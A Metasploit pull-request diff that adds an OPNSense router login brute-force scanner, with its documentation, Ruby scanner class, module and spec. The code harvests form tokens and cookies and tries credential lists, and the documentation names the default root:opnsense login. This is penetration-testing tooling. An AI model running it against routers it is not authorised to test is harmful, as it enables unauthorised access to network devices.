Merge pull request rapid7#19992 from sjanusz-r7/add-opnsense-login-scanner

Add OPNSense Login Scanner module

Author: jheysel-r7

documentation/modules/auxiliary/scanner/http/opnsense_login.md

@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module attempts to bruteforce credentials for OPNSense.
+
+This module was specifically tested on version 25.1 and 21.1, with older versions being unavailable from OPNSense mirrors.
+
+Note:
+
+By default, OPNSense comes with a built-in account named `root` with the password being `opnsense`.
+
+When performing too many login attempts, OPNSense will drop all packets coming from your IP, until the router is either:
+- Restarted
+- An anti-lockout rule is added
+
+## Verification Steps
+
+1. Set up an OPNSense VM or target a real installation
+1. Start `bundle exec ./msfconsole -q`
+1. `use auxiliary/scanner/http/opnsense_login`
+1. `set ssl true`
+1. `set pass_file ...`
+1. `set user_file ...`
+1. `run`
+1. or, using some example inline options:
+```
+run pass_file=data/wordlists/default_pass_for_services_unhash.txt \
+ user_file=data/wordlists/default_pass_for_services_unhash.txt \ 
+ STOP_ON_SUCCESS=true SSL=true rport=443
+```
+1. Verify you get a login:
+```
+[+] 192.168.207.158:443 - Login Successful: root:opnsense
+```
+
+## Options
+
+### BLANK_PASSWORD
+
+Set to `true` if an additional login attempt should be made with an empty password for every user.
+
+### BRUTEFORCE_SPEED
+
+How fast to bruteforce, from 0 to 5
+
+### PASSWORD
+
+A specific password to authenticate with
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+
+Stop guessing when a credential works for a host
+
+### THREADS
+
+The number of concurrent threads (max one per host)
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line
+
+### USER_FILE
+
+File containing usernames, one per line
+
+### VERBOSE
+
+Whether to print output for all attempts
+
+## Scenarios
+```
+msf6 auxiliary(scanner/http/opnsense_login) > options
+
+Module options (auxiliary/scanner/http/opnsense_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          opnsense         no        A specific password to authenticate with
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.207.161  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             443              yes       The target port (TCP)
+   SSL               true             yes       Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   TARGETURI         /                yes       The base path to the OPNSense application
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          root             no        A specific username to authenticate as
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/opnsense_login) > run
+[+] 192.168.207.161:443 - Login Successful: root:opnsense
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

lib/metasploit/framework/login_scanner/opnsense.rb

@@ -0,0 +1,138 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Deciso B.V. OPNSense instances.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class OPNSense < HTTP
+
+        # Retrieve the wanted cookie value by name from the HTTP response.
+        #
+        # @param [Rex::Proto::Http::Response] response The response from which to extract cookie values
+        # @param [String] wanted_cookie_name The cookie name for which to get the value
+        def get_cookie_value(response, wanted_cookie_name)
+          response.get_cookies.split('; ').find { |cookie| cookie.start_with?(wanted_cookie_name) }.split('=').last
+        end
+
+        # Checks if the target is OPNSense. The login module should call this.
+        #
+        # @return [Boolean, String] FalseClass if target is OPNSense, otherwise String
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s)
+          }
+          res = send_request(request_params)
+
+          if res && res.code == 200 && res.body&.include?('Login | OPNsense')
+            return false
+          end
+
+          "Unable to locate \"Login | OPNsense\" in body. (Is this really OPNSense?)"
+        end
+
+        # Query the magic value and cookies from the OPNSense login page.
+        #
+        # @return [Hash<Symbol, Object>] A hash of the status and error or result.
+        def query_magic_value_and_cookies
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s)
+          }
+
+          res = send_request(request_params)
+
+          if res.nil?
+            return { status: :failure, error: 'Did not receive response to a GET request' }
+          end
+
+          if res.code != 200
+            return { status: :failure, error: "Unexpected return code from GET request - #{res.code}" }
+          end
+
+          if res.body.nil?
+            return { status: :failure, error: 'Received an empty body from GET request' }
+          end
+
+          # The magic name and value are hidden on the login form, so we extract them using get_html_document
+          form_input = res.get_html_document&.at('input')
+
+          if form_input.nil? || form_input['type'] != 'hidden'
+            return { status: :failure, error: 'Could not find hidden magic field in the login form.' }
+          end
+
+          magic_value = { name: form_input['name'], value: form_input['value'] }
+          cookies = "PHPSESSID=#{get_cookie_value(res, 'PHPSESSID')}; cookie_test=#{get_cookie_value(res, 'cookie_test')}"
+          { status: :success, result: { magic_value: magic_value, cookies: cookies } }
+        end
+
+        # Each individual login needs their own magic name and value.
+        # This magic value comes from the login form received in response to a GET request to the login page.
+        # Each login attempt also requires specific cookies to be set, otherwise an error is returned.
+        #
+        # @param username Username
+        # @param password Password
+        # @param magic_value A hash containing the magic_value name and value
+        # @param cookies A cookie string
+        def try_login(username, password, magic_value, cookies)
+          request_params =
+            {
+              'method' => 'POST',
+              'uri' => normalize_uri(@uri.to_s),
+              'cookie' => cookies,
+              'vars_post' => {
+                magic_value[:name] => magic_value[:value],
+                'usernamefld' => username,
+                'passwordfld' => password,
+                'login' => '1'
+              }
+            }
+
+          { status: :success, result: send_request(request_params) }
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential:   credential,
+            host:         @host,
+            port:         @port,
+            protocol:     'tcp',
+            service_name: 'opnsense'
+          }
+
+          # Each login needs its own magic name and value
+          magic_value_and_cookies = query_magic_value_and_cookies
+
+          if magic_value_and_cookies[:status] != :success
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNTRIED, proof: magic_value_and_cookies[:error])
+            return Result.new(result_options)
+          end
+
+          login_result = try_login(credential.public, credential.private, magic_value_and_cookies[:result][:magic_value], magic_value_and_cookies[:result][:cookies])
+
+          if login_result[:result].nil?
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to OPNSense')
+            return Result.new(result_options)
+          end
+
+          # 200 is incorrect result
+          if login_result[:result].code == 200 || login_result[:result].body.include?('Username or Password incorrect')
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::INCORRECT, proof: 'Username or Password incorrect')
+            return Result.new(result_options)
+          end
+
+          login_status = login_result[:result].code == 302 ? ::Metasploit::Model::Login::Status::SUCCESSFUL : ::Metasploit::Model::Login::Status::INCORRECT
+          result_options.merge!(status: login_status, proof: login_result[:result])
+          Result.new(result_options)
+
+        rescue ::Rex::ConnectionError => _e
+          result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to OPNSense')
+          return Result.new(result_options)
+        end
+      end
+    end
+  end
+end

lib/msf_autoload.rb

@@ -302,6 +302,7 @@ def custom_inflections
       'nist_sp_800_38f' => 'NIST_SP_800_38f',
       'nist_sp_800_108' => 'NIST_SP_800_108',
       'pfsense' => 'PfSense',
+      'opnsense' => 'OPNSense',
       'pgadmin' => 'PgAdmin',
     }
   end

modules/auxiliary/scanner/http/opnsense_login.rb

@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/opnsense'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OPNSense Login Scanner',
+        'Description' => 'This module performs login attempts against a Deciso B.V OPNSense router webpage to bruteforce possible credentials.',
+        'Author' => [ 'sjanusz-r7' ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [],
+          'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Msf::OptString.new('TARGETURI', [true, 'The base path to the OPNSense application', '/']),
+        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),
+        Opt::RPORT(443),
+      ], self.class
+    )
+
+    deregister_options('DOMAIN')
+  end
+
+  def process_credential(credential_data)
+    credential_combo = "#{credential_data[:username]}:#{credential_data[:private_data]}"
+    case credential_data[:status]
+    when Metasploit::Model::Login::Status::SUCCESSFUL
+      print_good "#{credential_data[:address]}:#{credential_data[:port]} - Login Successful: #{credential_combo}"
+      credential_data[:core] = create_credential(credential_data)
+      create_credential_login(credential_data)
+      return { status: :success, credential: credential_data }
+    else
+      if credential_data[:proof]
+        error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]} : #{credential_data[:proof]})"
+      else
+        error_msg = "#{credential_data[:address]}:#{credential_data[:port]} - LOGIN FAILED: #{credential_combo} (#{credential_data[:status]})"
+      end
+      vprint_error error_msg
+      invalidate_login(credential_data)
+      return { status: :fail, credential: credential_data }
+    end
+  end
+
+  def run_scanner(scanner)
+    successful_logins = []
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      processed_credential = process_credential(credential_data)
+      successful_logins << processed_credential[:credential] if processed_credential[:status] == :success
+    end
+    { successful_logins: successful_logins }
+  end
+
+  def run_host(ip)
+    cred_collection = build_credential_collection(
+      username: datastore['USERNAME'],
+      password: datastore['PASSWORD']
+    )
+
+    scanner_opts = configure_http_login_scanner(
+      host: ip,
+      uri: target_uri,
+      port: datastore['RPORT'],
+      proxies: datastore['Proxies'],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+      connection_timeout: datastore['HttpClientTimeout'] || 5,
+      framework: framework,
+      framework_module: self,
+      method: 'POST',
+      ssl: datastore['SSL']
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::OPNSense.new(scanner_opts)
+    run_scanner(scanner)
+  end
+end

spec/lib/metasploit/framework/login_scanner/opnsense_spec.rb

@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/opnsense'
+
+RSpec.describe Metasploit::Framework::LoginScanner::OPNSense do
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: true, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+end